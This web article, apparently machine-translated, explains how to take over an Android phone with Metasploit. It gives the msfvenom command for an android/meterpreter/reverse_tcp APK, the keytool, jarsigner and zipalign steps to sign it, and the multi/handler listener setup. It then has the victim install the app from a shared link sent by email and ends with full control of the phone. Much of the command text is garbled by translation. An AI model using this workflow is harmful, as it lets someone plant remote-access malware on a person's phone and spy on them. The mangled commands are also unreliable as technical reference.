带你了解黑客是如何使用Metasploit对安卓手机进行控制!

      最后更新:2020-04-11 11:57:41 手机定位技术交流文章

      这篇文章的内容可能在某种程度上令人不快。这篇文章仅用于技术交流。任何非法使用都将自担风险。

      在这个实验中,我将使用kali linux和Android模拟器来演示如何使用Metasploit框架来控制Android设备。

      创建负载

      我们需要两个虚拟机:卡利Linux和安卓模拟器。

      打开虚拟机并启动Kali linux。然后打开终端,使用MSF毒液制作安卓应用程序。

      MSF蛇毒是msfpayload和msfencode的组合。这是一个单一的工具。它有标准的命令行选项。Msfvenom制造的有效载荷用于穿透安卓模拟器。

      在打开终端提示符下输入以下命令后,使用msf毒液工具创建有效载荷APK文件。

      msfvene-p Android/meter preter/reverse _ TCP LHOST = 192 . 168 . 1128 LPORT = 4444 R & gt。/根/桌面/五旬节

      p设置要使用的有效负载。

      左后设置用于接收反弹连接的主机

      设置用于接收反弹连接的端口

      设置文件格式

      要保存的位置文件位置

      在这个命令被执行后,你会看到一些错误,但是不要担心。生成的apk现在可以在输出目录中查看。

      我们已经成功地创建了安卓格式(APK)文件的有效载荷。目前,没有适当的签名证书,一般的安卓移动设备不允许安装应用程序。安卓设备只安装带有签名文件的APK。

      我们可以使用以下工具手动签名:

      l键工具(已安装)

      L jar签名者(已安装)

      L zipalign(需要安装)

      执行以下命令签名。首先使用密钥工具创建密钥库。

      key tool-gen key-v-keystore my-release-key。密钥库-别名-名称-密钥组-密钥大小204有效性10000 '

      然后用签名人签下APK

      JARsigner-verbose-sigalgsha 1 with RSA-digitalgsha keystore my-release-key . keystore appname . apkalias name `用JARsigner验证签名

      jarsigner-verify-verbose-certs APPNAME . apk ` a

      Kali没有预装Zipling,需要先安装Zipling。然后使用zipalign验证apk。

      zip align-v 4 APPNAME . apk NEWAPPNAME . apk

      现在我们有一个签名APK,可以安装在任何设备上。

      使用Metasploit进行测试

      接下来,启动metasploit的侦听器。执行msfconsole打开控制台。

      使用漏洞/多/处理器设置有效负载安卓/仪表预测器/反向_tcp设置左后192.168.152.128设置左后4444漏洞

      是时候将恶意的APK发送到手机上了。我们使用网络磁盘上传我们的APK,并共享下载链接。

      这是我们切换到安卓模拟器。

      1.从https://code.google.com/archive/p/android-x86/downloads. 2下载安卓x86的iso。使用vmware创建内核版本为2.6的虚拟机。3.装载镜像并启动虚拟机。4.进入实时模式。5.设置你的手机并登录谷歌账户。点击安卓模拟器中的链接并下载。我们已经向受害者的谷歌账户发送了一封电子邮件。

      此外,安卓应该被允许安装来历不明的apk。

      回到卡利,我们发现已经创建了一个新的会话。

      然后你可以随心所欲地操作“手机”。

      本文由 在线网速测试 整理编辑,转载请注明出处,原文链接:https://www.wangsu123.cn/news/4167.html

          热门文章

          文章分类